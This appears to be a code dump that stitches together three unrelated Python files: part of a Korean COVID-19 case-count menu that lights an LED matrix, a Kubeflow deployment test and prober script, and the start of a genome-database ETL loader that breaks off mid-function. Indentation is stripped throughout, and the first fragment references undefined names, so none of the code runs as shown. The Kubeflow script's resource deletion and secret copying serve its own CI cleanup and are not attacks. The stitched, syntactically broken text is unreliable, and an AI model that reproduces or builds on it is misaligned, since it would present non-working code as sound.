[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
# Function to look up the number of confirmed cases for a region
def search_count(js_file, search_region, array=array_screen):  # default added: two call sites omit `array`
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
print(json_data[i]['확진자수'])
array[1][1] = 1
for x in range(16):
for y in range(32):
if array[x][y] == 1:
LMD.set_pixel(x,y,0)
# Function to look up the day-over-day change in confirmed cases for a region
def count_change(js_file,search_region):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
return json_data[i]['전날비교']
menu = 1
while menu:
print("*****Menu*****")
print("1.All")
print("2.Seoul")
print("3.Gyeonggi")
print("4.Exit")
print("**************")
menu_choice = int(input("Select menu: "))
    # Each sub-menu loops until the user enters 0 to go back
    while menu_choice == 1:  # search nationwide confirmed cases
        js_file = "koreaRegionalData.js"
        search_region = input("Enter a region (e.g. 서울): ")
        if search_region == '0':  # entering 0 returns to the menu
            break
        search_count(js_file, search_region)
    while menu_choice == 2:  # search confirmed cases for Seoul districts
        js_file = 'koreaData_Seoul_' + a + '.js'
        search_region = input("Enter a district (e.g. 종로구): ")
        if search_region == '0':  # entering 0 returns to the menu
            break
        search_count(js_file, search_region, array_screen)
    while menu_choice == 3:  # search confirmed cases for Gyeonggi districts
        js_file = "koreaData_Gyeonggi.js"
        search_region = input("Enter a district (e.g. 수원): ")
        if search_region == '0':  # entering 0 returns to the menu
            break
        search_count(js_file, search_region)
        print(str(count_change(js_file, search_region)), "more than the previous day")
    if menu_choice == 4:  # exit the menu
menu = 0
|
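The crawler output read above is a JSON array of region records. A hedged sketch of the expected shape (values are illustrative; the keys match those the code reads):

sample = [
    {"지역이름": "서울", "확진자수": 123, "전날비교": 4},
    {"지역이름": "부산", "확진자수": 45, "전날비교": 1},
]
with open("sample.js", "w", encoding="utf-8") as f:
    json.dump(sample, f, ensure_ascii=False)
search_count("sample.js", "서울", array_screen)  # prints 123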
test_deploy_app.py | # -*- coding: utf-8 -*-
# Script to start the deployment api and make requests to it.
import argparse
import base64
import datetime
import logging
import os
import errno
import shutil
import subprocess
import tempfile
import threading
from functools import partial
from multiprocessing import Process
from time import sleep
from google.auth.transport.requests import Request
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
from prometheus_client import start_http_server, Gauge, Counter
import requests
import yaml
import google.auth
import google.auth.compute_engine.credentials
import google.auth.iam
import google.oauth2.credentials
import google.oauth2.service_account
from retrying import retry
from kubeflow.testing import test_util
FILE_PATH = os.path.dirname(os.path.abspath(__file__))
SSL_DIR = os.path.join(FILE_PATH, "sslcert")
SSL_BUCKET = 'kubeflow-ci-deploy-cert'
IAM_SCOPE = 'https://www.googleapis.com/auth/iam'
OAUTH_TOKEN_URI = 'https://www.googleapis.com/oauth2/v4/token'
METHOD = 'GET'
SERVICE_HEALTH = Gauge(
'deployment_service_status',
'0: normal; 1: deployment not successful; 2: service down')
PROBER_HEALTH = Gauge('prober_health', '0: normal; 1: not working')
LOADTEST_HEALTH = Gauge('loadtest_health', '0: normal; 1: not working')
LOADTEST_SUCCESS = Gauge('loadtest_success',
'number of successful requests in current load test')
SUCCESS_COUNT = Counter('deployment_success_count',
'accumulative count of successful deployment')
FAILURE_COUNT = Counter('deployment_failure_count',
'accumulative count of failed deployment')
LOADTEST_ZONE = [
'us-central1-a', 'us-central1-c', 'us-east1-c', 'us-east1-d', 'us-west1-b'
]
class requestThread(threading.Thread):
def __init__(self, target_url, req_data, google_open_id_connect_token):
threading.Thread.__init__(self)
self.target_url = target_url
self.req_data = req_data
self.google_open_id_connect_token = google_open_id_connect_token
def run(self):
try:
resp = requests.post(
"https://%s/kfctl/e2eDeploy" % self.target_url,
json=self.req_data,
headers={
'Authorization':
'Bearer {}'.format(self.google_open_id_connect_token)
})
if resp.status_code != 200:
logging.error("request failed:%s\n request data:%s"
% (resp, self.req_data))
# Mark service down if return code abnormal
SERVICE_HEALTH.set(2)
except Exception as e:
logging.error(e)
SERVICE_HEALTH.set(2)
def may_get_env_var(name):
env_val = os.getenv(name)
if env_val:
logging.info("%s is set" % name)
return env_val
else:
raise Exception("%s not set" % name)
def getZone(args, deployment):
if args.mode == "loadtest":
return LOADTEST_ZONE[int(deployment[-1]) % len(LOADTEST_ZONE)]
return args.zone
def get_target_url(args):
if args.mode == "loadtest":
return "deploy-staging.kubeflow.cloud"
if args.mode == "prober":
return "deploy.kubeflow.cloud"
raise RuntimeError("No default target url for test mode %s !" % args.mode)
def prepare_request_data(args, deployment):
logging.info("prepare deploy call data")
with open(
os.path.join(FILE_PATH, "../bootstrap/config/gcp_prototype.yaml"),
'r') as conf_input:
    defaultApp = yaml.safe_load(conf_input)["defaultApp"]
for param in defaultApp["parameters"]:
if param["name"] == "acmeEmail":
param["value"] = args.email
if param["name"] == "ipName":
param["value"] = deployment + "-ip"
if param["name"] == "hostname":
param["value"] = "%s.endpoints.%s.cloud.goog" % (deployment, args.project)
defaultApp['registries'][0]['version'] = args.kfversion
access_token = util_run(
'gcloud auth application-default print-access-token'.split(' '),
cwd=FILE_PATH)
client_id = may_get_env_var("CLIENT_ID")
client_secret = may_get_env_var("CLIENT_SECRET")
credentials = GoogleCredentials.get_application_default()
crm = discovery.build('cloudresourcemanager', 'v1', credentials=credentials)
project = crm.projects().get(projectId=args.project).execute()
logging.info("project info: %s", project)
request_data = {
"AppConfig": defaultApp,
"Apply": True,
"AutoConfigure": True,
"ClientId": base64.b64encode(client_id.encode()).decode("utf-8"),
"ClientSecret": base64.b64encode(client_secret.encode()).decode("utf-8"),
"Cluster": deployment,
"Email": args.email,
"IpName": deployment + '-ip',
"Name": deployment,
"Namespace": 'kubeflow',
"Project": args.project,
"ProjectNumber": project["projectNumber"],
# service account client id of account: kubeflow-testing@kubeflow-ci.iam.gserviceaccount.com
"SAClientId": args.sa_client_id,
"Token": access_token,
"Zone": getZone(args, deployment)
}
logging.info("request data: %s", request_data)
return request_data
def make_e2e_call(args):
if not clean_up_resource(args, set([args.deployment])):
raise RuntimeError("Failed to cleanup resource")
req_data = prepare_request_data(args, args.deployment)
resp = requests.post(
"http://kubeflow-controller.%s.svc.cluster.local:8080/kfctl/e2eDeploy" %
args.namespace,
json=req_data)
if resp.status_code != 200:
raise RuntimeError("deploy request received status code: %s, message: %s" %
(resp.status_code, resp.text))
logging.info("deploy call done")
# Make 1 deployment request to service url, return if request call successful.
def make_prober_call(args, service_account_credentials):
logging.info("start new prober call")
req_data = prepare_request_data(args, args.deployment)
google_open_id_connect_token = get_google_open_id_connect_token(
service_account_credentials)
try:
resp = requests.post(
"https://%s/kfctl/e2eDeploy" % get_target_url(args),
json=req_data,
headers={
'Authorization': 'Bearer {}'.format(google_open_id_connect_token)
})
if resp.status_code != 200:
# Mark service down if return code abnormal
SERVICE_HEALTH.set(2)
return False
except Exception as e:
logging.error(e)
SERVICE_HEALTH.set(2)
return False
logging.info("prober call done")
return True
# For each deployment, make a request to service url, return if all requests call successful.
def make_loadtest_call(args, service_account_credentials, projects, deployments):
logging.info("start new load test call")
google_open_id_connect_token = get_google_open_id_connect_token(
service_account_credentials)
threads = []
for project in projects:
args.project = project
for deployment in deployments:
req_data = prepare_request_data(args, deployment)
threads.append(
requestThread(
get_target_url(args), req_data, google_open_id_connect_token))
for t in threads:
t.start()
for t in threads:
t.join()
if SERVICE_HEALTH._value.get() == 2:
return False
logging.info("load test call done")
return True
def get_gcs_path(mode, project, deployment):
return os.path.join(SSL_BUCKET, mode, project, deployment)
# Insert ssl cert into GKE cluster
def insert_ssl_cert(args, deployment):
logging.info("Wait till deployment is done and GKE cluster is up")
credentials = GoogleCredentials.get_application_default()
service = discovery.build('deploymentmanager', 'v2', credentials=credentials)
# Wait up to 10 minutes till GKE cluster up and available.
end_time = datetime.datetime.now() + datetime.timedelta(minutes=10)
while datetime.datetime.now() < end_time:
sleep(5)
try:
request = service.deployments().get(
project=args.project, deployment=deployment)
response = request.execute()
if response['operation']['status'] != 'DONE':
logging.info("Deployment running")
continue
except Exception as e:
logging.info("Deployment hasn't started")
continue
break
ssl_local_dir = os.path.join(SSL_DIR, args.project, deployment)
if os.path.exists(ssl_local_dir):
shutil.rmtree(ssl_local_dir)
os.makedirs(ssl_local_dir)
logging.info("donwload ssl cert and insert to GKE cluster")
try:
# TODO: switch to client lib
gcs_path = get_gcs_path(args.mode, args.project, deployment)
util_run(("gsutil cp gs://%s/* %s" % (gcs_path, ssl_local_dir)).split(' '))
except Exception:
logging.warning("ssl cert for %s doesn't exist in gcs" % args.mode)
# clean up local dir
shutil.rmtree(ssl_local_dir)
return True
try:
create_secret(args, deployment, ssl_local_dir)
except Exception as e:
logging.error(e)
return False
return True
@retry(wait_fixed=2000, stop_max_delay=15000)
def create_secret(args, deployment, ssl_local_dir):
util_run(
("gcloud container clusters get-credentials %s --zone %s --project %s" %
(deployment, getZone(args, deployment), args.project)).split(' '))
util_run(("kubectl create -f %s" % ssl_local_dir).split(' '))
# deployments: set(string) which contains all deployment names in current test round.
def check_deploy_status(args, deployments):
num_deployments = len(deployments)
logging.info("check deployment status")
service_account_credentials = get_service_account_credentials("CLIENT_ID")
google_open_id_connect_token = get_google_open_id_connect_token(
service_account_credentials)
# Wait up to 30 minutes for IAP access test.
num_req = 0
end_time = datetime.datetime.now() + datetime.timedelta(
minutes=args.iap_wait_min)
success_deploy = set()
while datetime.datetime.now() < end_time and len(deployments) > 0:
sleep(10)
num_req += 1
for deployment in deployments:
url = "https://%s.endpoints.%s.cloud.goog" % (deployment, args.project)
logging.info("Trying url: %s", url)
try:
resp = requests.request(
METHOD,
url,
headers={
'Authorization':
'Bearer {}'.format(google_open_id_connect_token)
},
verify=False)
if resp.status_code == 200:
success_deploy.add(deployment)
logging.info("IAP is ready for %s!", url)
else:
logging.info(
"%s: IAP not ready, request number: %s" % (deployment, num_req))
except Exception:
logging.info("%s: IAP not ready, exception caught, request number: %s" %
(deployment, num_req))
deployments = deployments.difference(success_deploy)
for deployment in success_deploy:
try:
ssl_local_dir = os.path.join(SSL_DIR, deployment)
try:
os.makedirs(ssl_local_dir)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(ssl_local_dir):
pass
else:
raise
util_run((
"gcloud container clusters get-credentials %s --zone %s --project %s"
% (deployment, getZone(args, deployment), args.project)).split(' '))
for sec in ["envoy-ingress-tls", "letsencrypt-prod-secret"]:
sec_data = util_run(
("kubectl get secret %s -n kubeflow -o yaml" % sec).split(' '))
with open(os.path.join(ssl_local_dir, sec + ".yaml"),
'w+') as sec_file:
sec_file.write(sec_data)
sec_file.close()
# TODO: switch to client lib
gcs_path = get_gcs_path(args.mode, args.project, deployment)
util_run(
("gsutil cp %s/* gs://%s/" % (ssl_local_dir, gcs_path)).split(' '))
except Exception:
logging.error("%s: failed uploading ssl cert" % deployment)
# return number of successful deployments
return num_deployments - len(deployments)
def get_service_account_credentials(client_id_key):
# Figure out what environment we're running in and get some preliminary
# information about the service account.
credentials, _ = google.auth.default(scopes=[IAM_SCOPE])
if isinstance(credentials, google.oauth2.credentials.Credentials):
raise Exception('make_iap_request is only supported for service '
'accounts.')
# For service account's using the Compute Engine metadata service,
# service_account_email isn't available until refresh is called.
credentials.refresh(Request())
signer_email = credentials.service_account_email
if isinstance(credentials,
google.auth.compute_engine.credentials.Credentials):
signer = google.auth.iam.Signer(Request(), credentials, signer_email)
else:
# A Signer object can sign a JWT using the service account's key.
signer = credentials.signer
# Construct OAuth 2.0 service account credentials using the signer
# and email acquired from the bootstrap credentials.
return google.oauth2.service_account.Credentials(
signer,
signer_email,
token_uri=OAUTH_TOKEN_URI,
additional_claims={'target_audience': may_get_env_var(client_id_key)})
def get_google_open_id_connect_token(service_account_credentials):
service_account_jwt = (
service_account_credentials._make_authorization_grant_assertion())
request = google.auth.transport.requests.Request()
body = {
'assertion': service_account_jwt,
'grant_type': google.oauth2._client._JWT_GRANT_TYPE,
}
token_response = google.oauth2._client._token_endpoint_request(
request, OAUTH_TOKEN_URI, body)
return token_response['id_token']
def delete_gcloud_resource(args, keyword, filter='', dlt_params=None):
  # TODO: switch to client lib
  dlt_params = dlt_params or []  # avoid a mutable default argument
  get_cmd = 'gcloud compute %s list --project=%s --format="value(name)"' % (
keyword, args.project)
elements = util_run(get_cmd + filter, shell=True)
for element in elements.split('\n'):
dlt_cmd = 'gcloud compute %s delete -q --project=%s %s' % (
keyword, args.project, element)
try:
util_run(dlt_cmd.split(' ') + dlt_params)
except Exception as e:
logging.warning('Cannot remove %s %s' % (keyword, element))
logging.warning(e)
def clean_up_resource(args, deployments):
"""Clean up deployment / app config from previous test
Args:
args: The args from ArgParse.
deployments set(string): which contains all deployment names in current test round.
Returns:
bool: True if cleanup is done
"""
logging.info(
"Clean up project resource (source repo, backend service and deployment)")
# Delete source repo
sr_cmd = 'gcloud -q source repos delete %s-kubeflow-config --project=%s' % (
args.project, args.project)
try:
util_run(sr_cmd.split(' '), cwd=FILE_PATH)
except Exception as e:
logging.warning(e)
# Delete deployment
credentials = GoogleCredentials.get_application_default()
service = discovery.build('deploymentmanager', 'v2', credentials=credentials)
delete_done = False
for deployment in deployments:
try:
request = service.deployments().delete(
project=args.project, deployment=deployment)
request.execute()
except Exception as e:
logging.info("Deployment doesn't exist, continue")
# wait up to 10 minutes till delete finish.
end_time = datetime.datetime.now() + datetime.timedelta(minutes=10)
while datetime.datetime.now() < end_time:
sleep(10)
try:
request = service.deployments().list(project=args.project)
response = request.execute()
if ('deployments' not in response) or (len(deployments & set(
d['name'] for d in response['deployments'])) == 0):
delete_done = True
break
except Exception:
logging.info("Failed listing current deployments, retry in 10 seconds")
# Delete target-http-proxies
delete_gcloud_resource(args, 'target-http-proxies')
# Delete target-http-proxies
delete_gcloud_resource(args, 'target-https-proxies')
# Delete url-maps
delete_gcloud_resource(args, 'url-maps')
# Delete backend-services
delete_gcloud_resource(args, 'backend-services', dlt_params=['--global'])
# Delete instance-groups
for zone in LOADTEST_ZONE:
delete_gcloud_resource(
args,
'instance-groups unmanaged',
filter=' --filter=INSTANCES:0',
dlt_params=['--zone=' + zone])
# Delete ssl-certificates
delete_gcloud_resource(args, 'ssl-certificates')
# Delete health-checks
delete_gcloud_resource(args, 'health-checks')
if not delete_done:
logging.error("failed to clean up resources for project %s deployments %s",
args.project, deployments)
return delete_done
def util_run(command,
cwd=None,
env=None,
shell=False,
polling_interval=datetime.timedelta(seconds=1)):
"""Run a subprocess.
Any subprocess output is emitted through the logging modules.
Returns:
output: A string containing the output.
"""
logging.info("Running: %s \ncwd=%s", " ".join(command), cwd)
if not env:
env = os.environ
else:
keys = sorted(env.keys())
lines = []
for k in keys:
lines.append("{0}={1}".format(k, env[k]))
logging.info("Running: Environment:\n%s", "\n".join(lines))
  process = subprocess.Popen(
      command,
      cwd=cwd,
      env=env,
      shell=shell,
      universal_newlines=True,  # decode output so the str sentinels below work on Python 3
      stdout=subprocess.PIPE,
      stderr=subprocess.STDOUT)
# logging.info("Subprocess output:\n")
output = []
while process.poll() is None:
process.stdout.flush()
for line in iter(process.stdout.readline, ''):
output.append(line.strip('\n'))
# logging.info(line.strip())
sleep(polling_interval.total_seconds())
process.stdout.flush()
  for line in iter(process.stdout.readline, ''):
output.append(line.strip('\n'))
# logging.info(line.strip())
if process.returncode != 0:
raise subprocess.CalledProcessError(
process.returncode, "cmd: {0} exited with code {1}".format(
" ".join(command), process.returncode), "\n".join(output))
return "\n".join(output)
def clean_up_project_resource(args, projects, deployments):
proc = []
for project in projects:
args.project = project
p = Process(target = partial(clean_up_resource, args, deployments))
p.start()
proc.append(p)
for p in proc:
p.join()
def upload_load_test_ssl_cert(args, projects, deployments):
for project in projects:
args.project = project
for deployment in deployments:
insert_ssl_cert(args, deployment)
def check_load_test_results(args, projects, deployments):
num_deployments = len(deployments)
total_success = 0
# deadline for checking all the results.
end_time = datetime.datetime.now() + datetime.timedelta(
minutes=args.iap_wait_min)
for project in projects:
args.project = project
# set the deadline for each check.
now = datetime.datetime.now()
if end_time < now:
args.iap_wait_min = 1
else:
delta = end_time - now
args.iap_wait_min = delta.seconds / 60 + 1
num_success = check_deploy_status(args, deployments)
total_success += num_success
logging.info("%s out of %s deployments succeed for project %s",
num_success, num_deployments, project)
    # We only wait 1 minute for subsequent checks because we already waited for IAP above.
args.iap_wait_min = 1
LOADTEST_SUCCESS.set(num_success)
if num_success == num_deployments:
SUCCESS_COUNT.inc()
else:
FAILURE_COUNT.inc()
logging.info("%s out of %s deployments succeed in total",
total_success, num_deployments * len(projects))
def run_load_test(args):
num_deployments = args.number_deployments_per_project
num_projects = args.number_projects
start_http_server(8000)
LOADTEST_SUCCESS.set(num_deployments)
LOADTEST_HEALTH.set(0)
service_account_credentials = get_service_account_credentials(
"SERVICE_CLIENT_ID")
deployments = set(
['kubeflow' + str(i) for i in range(1, num_deployments + 1)])
projects = [args.project_prefix + str(i)
for i in range(1, num_projects + 1)]
logging.info("deployments: %s" % deployments)
logging.info("projects: %s" % projects)
clean_up_project_resource(args, projects, deployments)
if not make_loadtest_call(
args, service_account_credentials, projects, deployments):
LOADTEST_SUCCESS.set(0)
FAILURE_COUNT.inc()
logging.error("load test request failed")
return
upload_load_test_ssl_cert(args, projects, deployments)
check_load_test_results(args, projects, deployments)
clean_up_project_resource(args, projects, deployments)
def run_e2e_test(args):
sleep(args.wait_sec)
make_e2e_call(args)
insert_ssl_cert(args, args.deployment)
if not check_deploy_status(args, set([args.deployment])):
raise RuntimeError("IAP endpoint not ready after 30 minutes, time out...")
logging.info("Test finished.")
def wrap_test(args):
"""Run the tests given by args.func and output artifacts as necessary.
"""
test_name = "bootstrapper"
test_case = test_util.TestCase()
test_case.class_name = "KubeFlow"
test_case.name = args.workflow_name + "-" + test_name
try:
def run():
args.func(args)
test_util.wrap_test(run, test_case)
finally:
# Test grid has problems with underscores in the name.
# https://github.com/kubeflow/kubeflow/issues/631
# TestGrid currently uses the regex junit_(^_)*.xml so we only
# want one underscore after junit.
junit_name = test_case.name.replace("_", "-")
junit_path = os.path.join(args.artifacts_dir,
"junit_{0}.xml".format(junit_name))
logging.info("Writing test results to %s", junit_path)
test_util.create_junit_xml_file([test_case], junit_path)
# Clone repos to tmp folder and build docker images
def main(unparsed_args=None):
parser = argparse.ArgumentParser(
description="Start deployment api and make request to it.")
parser.add_argument(
"--deployment",
default="periodic-test",
type=str,
help="Deployment name.")
parser.add_argument(
"--email",
default="google-kubeflow-support@google.com",
type=str,
help="Email used during e2e test")
parser.add_argument(
"--project",
default="kubeflow-ci-deployment",
type=str,
help="e2e test project id")
parser.add_argument(
"--project_prefix",
default="kf-gcp-deploy-test",
type=str,
help="project prefix for load test")
parser.add_argument(
"--number_projects",
default="2",
type=int,
help="number of projects used in load test")
parser.add_argument(
"--number_deployments_per_project",
default="5",
type=int,
help="number of deployments per project used in load test")
parser.add_argument(
"--namespace",
default="",
type=str,
help="namespace where deployment service is running")
parser.add_argument(
"--wait_sec", default=120, type=int, help="oauth client secret")
parser.add_argument(
"--iap_wait_min", default=30, type=int, help="minutes to wait for IAP")
parser.add_argument(
"--zone", default="us-east1-d", type=str, help="GKE cluster zone")
parser.add_argument(
"--sa_client_id",
default="111670663612681935351",
type=str,
help="Service account client id")
parser.add_argument(
"--kfversion",
default="v0.4.1",
type=str,
help="Service account client id")
parser.add_argument(
"--mode",
default="e2e",
type=str,
help="offer three test mode: e2e, prober, and loadtest")
# args for e2e test
parser.set_defaults(func=run_e2e_test)
parser.add_argument(
"--artifacts_dir",
default="",
type=str,
help="Directory to use for artifacts that should be preserved after "
"the test runs. Defaults to test_dir if not set.")
parser.add_argument(
"--workflow_name",
default="deployapp",
type=str,
help="The name of the workflow.")
args = parser.parse_args(args=unparsed_args)
if not args.artifacts_dir:
args.artifacts_dir = tempfile.gettempdir()
util_run(
('gcloud auth activate-service-account --key-file=' +
may_get_env_var("GOOGLE_APPLICATION_CREDENTIALS")).split(' '),
cwd=FILE_PATH)
if args.mode == "e2e":
wrap_test(args)
if args.mode == "prober":
start_http_server(8000)
SERVICE_HEALTH.set(0)
PROBER_HEALTH.set(0)
service_account_credentials = get_service_account_credentials(
"SERVICE_CLIENT_ID")
while True:
sleep(args.wait_sec)
if not clean_up_resource(args, set([args.deployment])):
PROBER_HEALTH.set(1)
FAILURE_COUNT.inc()
logging.error(
"request cleanup failed, retry in %s seconds" % args.wait_sec)
continue
PROBER_HEALTH.set(0)
if make_prober_call(args, service_account_credentials):
if insert_ssl_cert(args, args.deployment):
PROBER_HEALTH.set(0)
else:
PROBER_HEALTH.set(1)
FAILURE_COUNT.inc()
logging.error("request insert_ssl_cert failed, retry in %s seconds" %
args.wait_sec)
continue
if check_deploy_status(args, set([args.deployment])):
SERVICE_HEALTH.set(0)
SUCCESS_COUNT.inc()
else:
SERVICE_HEALTH.set(1)
FAILURE_COUNT.inc()
else:
SERVICE_HEALTH.set(2)
FAILURE_COUNT.inc()
logging.error(
"prober request failed, retry in %s seconds" % args.wait_sec)
if args.mode == "loadtest":
run_load_test(args)
if __name__ == '__main__':
logging.basicConfig(
level=logging.INFO,
format=('%(levelname)s|%(asctime)s'
'|%(pathname)s|%(lineno)d| %(message)s'),
datefmt='%Y-%m-%dT%H:%M:%S',
)
logging.getLogger('googleapiclient.discovery_cache').setLevel(logging.ERROR)
logging.getLogger().setLevel(logging.INFO)
main()
|
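Illustrative command lines for the three test modes wired up in main(); flag values are placeholders, and GOOGLE_APPLICATION_CREDENTIALS plus CLIENT_ID/CLIENT_SECRET must already be set in the environment:

python test_deploy_app.py --mode=e2e --deployment=periodic-test --project=my-gcp-project
python test_deploy_app.py --mode=prober --wait_sec=300
python test_deploy_app.py --mode=loadtest --number_projects=2 --number_deployments_per_project=5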
aggregate_loader.py | #!/usr/bin/env python
"""This is the main entry-point for running the ETL pipeline."""
import argparse
import logging
import multiprocessing
import os
import time
import coloredlogs
from etl import (BGIETL, DOETL, ECOMAPETL, ETL, GOETL, MIETL, VEPETL,
AffectedGenomicModelETL, AlleleETL, ClosureETL, ConstructETL,
DiseaseETL, ExpressionAtlasETL, ExpressionETL,
ExpressionRibbonETL, ExpressionRibbonOtherETL,
GeneDescriptionsETL, GeneDiseaseOrthoETL, GenericOntologyETL,
GeoXrefETL, GOAnnotETL, MolecularInteractionETL, Neo4jHelper,
NodeCountETL, OrthologyETL, PhenoTypeETL,
SequenceTargetingReagentETL, SpeciesETL, TranscriptETL,
VariationETL, VEPTranscriptETL,
HTPMetaDatasetSampleETL, HTPMetaDatasetETL)
from transactors import FileTransactor, Neo4jTransactor
from data_manager import DataFileManager
from files import Download
from loader_common import ContextInfo # Must be the last import otherwise the program fails
def main():
"""Entry point to ETL program."""
parser = argparse.ArgumentParser(
description='Load data into the Neo4j database for the Alliance of Genome Resources.'
)
parser.add_argument(
'-c',
'--config', help='Specify the filename of the YAML config. It must reside in the src/config/ directory',
default='default.yml'
)
parser.add_argument('-v',
'--verbose',
help='Enable DEBUG mode for logging.',
action='store_true')
args = parser.parse_args()
# set context info
context_info = ContextInfo()
context_info.config_file_location = os.path.abspath('src/config/' + args.config)
if args.verbose:
context_info.env["DEBUG"] = True
debug_level = logging.DEBUG if context_info.env["DEBUG"] else logging.INFO
coloredlogs.install(level=debug_level,
fmt='%(asctime)s %(levelname)s: %(name)s:%(lineno)d: %(message)s',
field_styles={
'asctime': {'color': 'green'},
'hostname': {'color': 'magenta'},
'levelname': {'color': 'white', 'bold': True},
'name': {'color': 'blue'},
'programname': {'color': 'cyan'}
})
logger = logging.getLogger(__name__)
logging.getLogger("ontobio").setLevel(logging.ERROR)
AggregateLoader(args, logger, context_info).run_loader()
class AggregateLoader():
"""This runs all the individiual ETL pipelines."""
# This is the list of ETLs used for loading data.
# The key (left) is derived from a value in the config YAML file.
# The value (right) is hard-coded by a developer as the name of an ETL class.
etl_dispatch = {
'SPECIES': SpeciesETL,
'MI': MIETL, # Special case. Grouped under "Ontology" but has a unique ETL.
'DOID': DOETL, # Special case. Grouped under "Ontology" but has a unique ETL.
'BGI': BGIETL,
'CONSTRUCT': ConstructETL,
'GENEEEXPRESSIONATLASSITEMAP': ExpressionAtlasETL,
'ONTOLOGY': GenericOntologyETL,
'ECOMAP': ECOMAPETL,
'ALLELE': AlleleETL,
'VARIATION': VariationETL,
'SQTR': SequenceTargetingReagentETL,
'AGM': AffectedGenomicModelETL,
'PHENOTYPE': PhenoTypeETL,
'GFF': TranscriptETL,
'GO': GOETL,
'EXPRESSION': ExpressionETL,
'ExpressionRibbon': ExpressionRibbonETL,
'ExpressionRibbonOther': ExpressionRibbonOtherETL,
'DAF': DiseaseETL,
'ORTHO': OrthologyETL,
'Closure': ClosureETL,
'GAF': GOAnnotETL,
'GEOXREF': GeoXrefETL,
'HTPDATASET': HTPMetaDatasetETL,
'HTPDATASAMPLE': HTPMetaDatasetSampleETL,
'GeneDiseaseOrtho': GeneDiseaseOrthoETL,
'INTERACTION-MOL': MolecularInteractionETL,
'GeneDescriptions': GeneDescriptionsETL,
'VEPGENE': VEPETL,
'VEPTRANSCRIPT': VEPTranscriptETL,
'DB-SUMMARY': NodeCountETL
}
# This is the order in which data types are loaded.
# After each list, the loader will "pause" and wait for that item to finish.
# i.e. After Ontology, there will be a pause.
# After GO, DO, MI, there will be a pause, etc.
etl_groups = [
['SPECIES'],
['DOID', 'MI'],
['GO'],
['ONTOLOGY'],
['ECOMAP'],
['BGI'],
['CONSTRUCT'],
['ALLELE'],
['VARIATION'],
['SQTR'],
['AGM'],
['PHENOTYPE'], # Locks Genes
['DAF'], # Locks Genes
['ORTHO'], # Locks Genes
['GeneDiseaseOrtho'],
['GFF'],
['EXPRESSION'],
['ExpressionRibbon'],
['ExpressionRibbonOther'],
['GENEEEXPRESSIONATLASSITEMAP'],
['GAF'], # Locks Genes
['GEOXREF'], # Locks Genes
['HTPDATASET'],
['HTPDATASAMPLE'],
['INTERACTION-MOL'],
['Closure'],
['GeneDescriptions'],
['VEPGENE'],
['VEPTRANSCRIPT'],
['DB-SUMMARY']
]
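# e.g. the ['DOID', 'MI'] group runs DOETL and MIETL in parallel processes;
# run_etl_groups below then waits for both (and for the Neo4j queues to
# drain) before the next group, ['GO'], is started.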
def __init__(self, args, logger, context_info):
"""Initialise object."""
self.args = args
self.logger = logger
self.context_info = context_info
self.start_time = time.time()
context_info = ContextInfo()
self.schema_branch = context_info.env["TEST_SCHEMA_BRANCH"]
if self.schema_branch != 'master':
self.logger.warning("*******WARNING: Using branch %s for schema.", self.schema_branch)
# Let's delete the old files and download new ones. They are small.
for name in ['tmp/species.yaml', 'tmp/resourceDescriptors.yaml']:
if os.path.exists(name):
self.logger.warning("*********WARNING: removing old %s file.", name)
os.remove(name)
self.logger.info("Getting files initially")
url = 'https://raw.githubusercontent.com/alliance-genome/agr_schemas/SCHEMA_BRANCH/resourceDescriptors.yaml'
url = url.replace('SCHEMA_BRANCH', self.schema_branch)
Download('tmp', url, 'resourceDescriptors.yaml').get_downloaded_data()
url = 'https://raw.githubusercontent.com/alliance-genome/agr_schemas/SCHEMA_BRANCH/ingest/species/species.yaml'
url = url.replace('SCHEMA_BRANCH', self.schema_branch)
Download('tmp', url, 'species.yaml').get_downloaded_data()
self.logger.info("Finished getting files initially")
@classmethod
def run_etl_groups(cls, logger, data_manager, neo_transactor):
"""Run each of the ETLs in parallel."""
etl_time_tracker_list = []
for etl_group in cls.etl_groups:
etl_group_start_time = time.time()
logger.info("Starting ETL group: %s" % etl_group)
thread_pool = []
for etl_name in etl_group:
logger.info("ETL Name: %s" % etl_name)
config = data_manager.get_config(etl_name)
if config is not None:
etl = cls.etl_dispatch[etl_name](config)
process = multiprocessing.Process(target=etl.run_etl)
process.start()
thread_pool.append(process)
else:
logger.info("No Config found for: %s" % etl_name)
ETL.wait_for_threads(thread_pool)
logger.info("Waiting for Queues to sync up")
neo_transactor.check_for_thread_errors()
neo_transactor.wait_for_queues()
etl_elapsed_time = time.time() - etl_group_start_time
etl_time_message = ("Finished ETL group: %s, Elapsed time: %s"
% (etl_group,
time.strftime("%H:%M:%S", time.gmtime(etl_elapsed_time))))
logger.info(etl_time_message)
etl_time_tracker_list.append(etl_time_message)
return etl_time_tracker_list
def run_loader(self):
"""Run the loader."""
if self.args.verbose:
self.logger.warning('DEBUG mode enabled!')
time.sleep(3)
data_manager = DataFileManager(self.context_info.config_file_location)
file_transactor = FileTransactor()
file_transactor.start_threads(data_manager.get_file_transactor_thread_settings())
data_manager.download_and_validate()
self.logger.debug("finished downloading now doing thread")
file_transactor.check_for_thread_errors()
self.logger.debug("finished threads waiting for queues")
file_transactor.wait_for_queues()
self.logger.debug("finished queues waiting for shutdown")
file_transactor.shutdown()
neo_transactor = Neo4jTransactor()
